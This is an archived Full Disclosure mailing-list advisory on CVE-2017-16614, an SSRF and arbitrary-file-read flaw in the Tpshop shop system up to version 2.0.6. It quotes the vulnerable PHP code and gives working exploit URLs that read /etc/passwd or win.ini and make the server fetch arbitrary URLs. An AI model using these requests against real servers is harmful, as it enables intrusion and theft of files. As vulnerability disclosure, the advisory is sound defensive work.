'[FD] =?gb2312?b?U1NSRqOoU2VydmVyIFNpZGUgUmVxdWVzdCBGb3JnZXJ5o6kg?= =?gb2312?b?aW4gVHBzaG9wIDw9IDIuMC'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] =?gb2312?b?U1NSRqOoU2VydmVyIFNpZGUgUmVxdWVzdCBGb3JnZXJ5o6kg?= =?gb2312?b?aW4gVHBzaG9wIDw9IDIuMC
From:       "service () baimaohui ! net" <service () baimaohui ! net>
Date:       2018-03-29 11:40:59
Message-ID: 2018032919405918404913 () baimaohui ! net+E95355A8E30FC710
[Download RAW message or body]

# SSRF（Server Side Request Forgery） in Tpshop <= 2.0.6 (CVE-2017-16614)

The Tpshop open source mall system is a  multi-merchant mode mall system developed by Shenzhen \
Leopard Network Co., Ltd.This system is based on the Thinkphp development framework. 

## Product Download: http://www.tp-shop.cn/Index/Index/download.html

## Vulnerability Type：SSRF（Server Side Request Forgery）

## Attack Type : Remote

## Vulnerability Description

Tpshop’s former version 2.0.6  is vulnerable to SSRF（Server Side Request Forgery） in the \
fBill parameter within the "/plugins/payment/weixin/lib/WxPay.tedatac.php?fBil=" path. This \
vulnerability can lead to arbitrary files reading, network port scanning，information \
detection, internal network server attack.

The vulnerability code:

    if($_GET['fBill'] && $_GET['WxPayDataBase'])
    {
        header('Content-type: image/jpeg');
        $handle = fopen($_GET['fBill'], 'r');
        fseek($handle , $_GET['WxPayDataBase']);
        fpassthru($handle);
    }

## Exploit

http://tpshop_path/plugins/payment/weixin/lib/WxPay.tedatac.php?fBill=file:///c:/windows/win.ini&WxPayDataBase=test

modify the above fBill parameter，example:

request http protocol: fBill=http://www.google.com

request https protocol: fBill=https://www.google.com

request ftp protocol: fBill=ftp://www.google.com

file read：fBil=file:///etc/passwd or fBil=file:///c:/windows/win.ini

## Versions

Tpshop <= 2.0.6

## Impact

SSRF(Server Side Request Forgery) in Tpshop before version 2.0.6 allow remote attackers to \
arbitrary files read，scan network port，information detection,internal network server attack.

## Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang &  National Computer \
Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)

## References

CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16614

service@baimaohui.net

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 